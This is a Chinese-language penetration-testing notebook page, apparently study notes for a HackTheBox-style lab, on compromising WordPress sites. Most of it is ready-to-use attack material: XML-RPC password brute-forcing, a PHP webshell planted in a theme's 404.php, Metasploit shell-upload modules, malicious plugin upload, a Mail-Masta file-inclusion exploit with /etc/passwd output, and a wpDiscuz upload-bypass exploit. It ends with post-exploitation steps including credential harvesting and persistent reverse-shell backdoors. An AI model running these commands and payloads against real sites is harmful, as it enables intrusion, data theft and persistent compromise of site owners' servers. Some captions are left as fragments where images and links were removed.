0xdfxyz
  • Penetration Testing Process
    • README.md
    • Whois
  • Nikto
  • Search Engine Discovery
  • FinalRecon
  • Nessus
  • 0_新手上路
    • 0_新手上路
  • 1_訊息收集
    • 服務枚舉
      • Page 6
      • Nmap
      • DNS
    • 應用枚舉
      • Page 6
    • A D枚舉
      • Page 6
    • web枚舉
      • Page 6
      • Web Fuzzing
      • Subdomain
  • 2_漏洞前準備
    • 反彈 Shell
    • 工具彙總
    • 字典生成
  • 3_漏洞利用
    • 應用漏洞利用
    • AD 攻擊
    • 二進位漏洞利用
    • Web漏洞利用
      • XSS
      • IDOR
      • Webshel​​l
      • File uploads
      • SSTI
      • LFI
      • SQL injection
      • XXE
      • HTTP Verb Tampering
      • Command Injection
    • 服務漏洞利用
      • CMS
        • Wordpress
        • Joolmla
        • Drupal
      • Servlet 容器/軟體開發
        • Jenkins
        • Tomcat
      • 基礎設施/網路監控工具
        • Splunk
        • PRTG Network Monitor
      • 客戶服務管理與配置管理
        • osTicket
        • Gitlab
      • 通用網關介面
        • 攻擊通用網關介面 (CGI) 應用程式 - Shellshock
      • 其他應用
        • ColdFusion
        • IIS Tilde
        • LDAP
      • 常見應用程式
        • Thick client(也稱為rich客戶端或fat客戶端
        • Web 批量分配漏洞 ( Ruby on Rails)
        • 攻擊連接到服務的應用程式(SSH)
  • 4_滲透
    • Linux 權限提升
    • Windows 權限提升
    • Windows + Linux 工具
  • 5_橫向移動
    • 工具
    • 跳板 Pivoting
    • AD 橫向移動
    • Linux 橫向移動
    • Windows 橫向移動
  • 6_NetExec
    • 常見模組
    • 命令執行
    • 漏洞掃描模組
    • 模組使用
    • 憑證轉儲
    • Kerberos 認證
    • LDAP RDP 枚舉
    • SMB 枚舉
由 GitBook 提供支持
在本页
  • 1. 發現點
  • 2. 測試Payload
  • 3. 後台取得 RCE
  • 4. 已知漏洞利用
  • 5.利用已知漏洞
  • 6. 連鎖漏洞

这有帮助吗?

  1. 3_漏洞利用
  2. 服務漏洞利用
  3. CMS

Wordpress

1. 發現點

1️⃣ 瀏覽 robots.txt

curl -s http://blog.inlanefreight.local/robots.txt

  • 有時會列出隱藏路徑

2️⃣ 確認 CMS

curl -s http://blog.inlanefreight.local | grep WordPress

  • 出現 WordPress 5.8 即可確認

3️⃣ 確認主題 & 插件

curl -s http://blog.inlanefreight.local/ | grep themes
curl -s http://blog.inlanefreight.local/ | grep plugins
curl -s http://blog.inlanefreight.local/?p=1 | grep plugins

透過路徑 /wp-content/themes/ 同 /wp-content/plugins/ 可以知道網站用咩主題/插件。

2. 測試Payload

1️⃣ 使用 WPScan

sudo gem install wpscan
sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token <你的token>

  • 列出用戶、主題、插件、版本、已知漏洞

2️⃣ 用戶爆破(XML-RPC)

sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local

如果爆破成功例如:

Username: john
Password: firebird1

即可以用 admin 身份登入 http://blog.inlanefreight.local/wp-login.php。

3. 後台取得 RCE

方法 A:修改主題檔案取得 WebShell

  1. 後台登入之後,去

外觀 > 主題檔案編輯器 (Appearance > Theme Editor)

  1. 選一個主題(例如 twentynineteen),然後選 404.php

  2. 在底部加入:

<?php system($_GET[0]); ?>

  1. 儲存並透過 cURL 測試:

curl http://blog.inlanefreight.local/wp-content/themes/twentynineteen/404.php?0=id

  • 出現 uid=33(www-data) 就成功!

方法 B:Metasploit 模組自動上傳 shell

msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set username john
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set password firebird1
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set lhost <你的IP>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set vhost blog.inlanefreight.local
msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit

成功就會開一個 meterpreter session。

Complete Version

PHP 外掛

可能可以將.php 檔案上傳為外掛。使用以下範例建立你的 php 後門:

然後新增一個插件:

上傳外掛程式並按立即安裝:

點選“處理”:

顯然這可能不會產生任何效果,但如果你進入媒體,你會看到你的 shell 已上傳:

存取它,你會看到執行反向shell的URL:

上傳並啟用惡意插件

有時候登入使用者沒有可寫的權限來對WordPress主題進行修改,所以我們選擇「注入WP pulgin惡意程式碼」作為取得web shell的替代策略。

因此,一旦您可以存取 WordPress 儀表板,您就可以嘗試安裝惡意外掛程式。這裡我已經從exploit db下載了有漏洞的插件。

由於我們有插件的 zip 文件,現在是時候上傳插件了。

儀表板 > 插件 > 上傳插件

瀏覽下載的 zip 文件,如圖所示。

一旦包成功安裝,我們需要啟動插件。

當一切設定好之後就可以進行利用了。由於我們安裝了名為“reflex-gallery”的易受攻擊的插件,因此它很容易被利用。

您將在 Metasploit 框架內利用此漏洞,從而載入以下模組並執行以下命令:

1234

使用exploit/unix/webapp/wp_slideshowgallery_uploadset rhosts 192.168.1.101set targeturi /wordpressexploit

執行上述命令後,您將擁有 meterpreter 會話。如本文所述,有許多方法可以利用 WordPress 平台網站。

4. 已知漏洞利用

1️⃣ Mail-Masta 插件 RFI(Remote File Inclusion)

  • 測試:

curl -s "http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"

  • 如果成功顯示 /etc/passwd,代表存在 RFI,進一步可利用上傳本地 payload。

2️⃣ wpDiscuz 文件上傳繞過(版本 <= 7.0.4)

  • 利用腳本上傳 PHP webshell:

python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1

  • 用 cURL 測試:

curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/<shell>.php?cmd=id

出現 uid=33(www-data),即 RCE 成功。

5.利用已知漏洞

易受攻擊的插件 - mail-masta

<?php 

include($_GET['pl']);
global $wpdb;

$camp_id=$_POST['camp_id'];
$masta_reports = $wpdb->prefix . "masta_reports";
$count=$wpdb->get_results("SELECT count(*) co from  $masta_reports where camp_id=$camp_id and status=1");

echo $count[0]->co;

?>

我們可以看到, pl參數允許我們包含一個文件,而無需任何類型的輸入驗證或清理。利用這個,我們可以在網頁伺服器上包含任意檔案。讓我們利用這一點來使用cURL檢索/etc/passwd檔案的內容。

PikachuN@htb[/htb]$ curl -s http://blog.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:x:1000:1000:ubuntu:/home/ubuntu:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false

易受攻擊的外掛 - wpDiscuz

python3 wp_discuz.py -u http://blog.inlanefreight.local -p /?p=1

所寫的漏洞可能會失敗,但是我們可以使用cURL使用上傳的 Web shell 執行命令。我們只需要在.php副檔名後面附加?cmd=即可執行我們可以在漏洞腳本中看到的指令。

curl -s http://blog.inlanefreight.local/wp-content/uploads/2021/08/uthsdkbywoxeebg-1629904090.8191.php?cmd=id

GIF689a;

uid=33(www-data) gid=33(www-data) groups=33(www-data)

6. 連鎖漏洞

一旦取得 webshell / meterpreter session,可以進一步:

攻擊動作
方法

提權

sudo -l 檢查 sudo 權限、或找可寫 cron 任務

密碼收集

檢查 wp-config.php 抓取資料庫帳密

內網掃描

netstat -anp 或 nmap -sP 內部段

橫向移動

試用相同帳密登入其他服務

持久化後門

在 /wp-content/uploads 或 /themes 留下反向 shell

上一页CMS下一页Joolmla

最后更新于1个月前

这有帮助吗?

(此部分複製自 )

點擊 **下載插件進行練習。

是一個 WordPress 插件,用於增強頁面貼文的評論功能。在撰寫本文時,該插件的,活躍安裝量超過 90,000 次,這使它成為我們很有可能在評估期間遇到的非常受歡迎的插件。根據版本號(7.0.4),此很有可能讓我們獲得命令執行。該漏洞的關鍵是文件上傳繞過。 wpDiscuz 僅允許圖像附件。檔案 mime 類型功能可能會被繞過,從而允許未經身份驗證的攻擊者上傳惡意 PHP 檔案並獲得遠端程式碼執行。關於 MIME 類型偵測功能繞過的更多資訊可以找到。

https://www.hackingarticles.in/wordpress-reverse-shell/
此處
wpDiscuz
下載量已超過 160 萬次
漏洞
在這裡